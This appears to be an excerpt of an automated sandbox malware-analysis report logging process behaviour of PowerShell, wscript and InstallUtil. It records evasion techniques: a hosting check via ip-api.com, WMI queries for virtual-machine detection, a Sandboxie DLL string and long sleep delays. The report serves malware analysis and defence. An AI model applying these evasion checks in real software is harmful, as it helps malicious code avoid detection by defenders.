Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000003.00000002.1778936511.000001CB9586E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2946845698.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.2943800071.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4EF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1560	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 919	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4693	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3777	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 5805	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600	Thread sleep count: 4693 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep count: 5094 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7852	Thread sleep count: 3777 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7852	Thread sleep count: 5805 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99632s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99362s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98655s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98436s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -98094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97433s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97316s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -97078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7848	Thread sleep time: -96933s >= -30000s	Jump to behavior
